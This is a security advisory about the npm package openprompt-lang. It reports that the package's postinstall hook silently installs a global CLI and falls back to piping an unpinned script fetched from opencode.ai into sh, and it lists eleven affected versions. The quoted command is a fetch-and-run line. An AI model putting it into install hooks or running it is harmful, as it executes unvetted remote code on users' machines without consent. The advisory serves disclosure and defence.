npm · Malicious package advisory
Malwareopenprompt-lang
MAL-2026-4630
Malicious code in openprompt-lang (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (24ccd29557423c05fb49b14b0a9a2e1cfbe5a2b69a1276bc76d287edc46f4ec2) On every `npm install`, openprompt-lang's postinstall hook (scripts/postinstall.js:83) executes `npm install -g @opencode/cli 2>/dev/null || curl -fsSL https://opencode.ai/install.sh 2>/dev/null | sh`. The fallback fetches an unpinned shell script from opencode.ai and pipes it directly to `sh` with no version, no hash, and no integrity check. The destination domain is not the package's publisher (the package is published under a different GitHub identity) and the auto-installed tool is unrelated to the package's stated purpose (a prompt-engineering CLI). Whatever bytes opencode.ai serves at install time run on every consumer's machine, with no user prompt or opt-out. If opencode.ai is ever compromised, redirected, or the served script is modified, every installer of openprompt-lang executes the new payload. The same line additionally performs an unsolicited global install of an unrelated third-party CLI (`@opencode/cli`), mutating the developer's global npm environment as a side effect of installing this library.
Compromised versions (11)
- 1.3.0
- 1.2.6
- 1.2.7
- 1.2.4
- 1.2.1
- 1.2.0
- 1.2.2
- 1.2.3
- 1.1.0
- 1.5.0
- 1.6.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.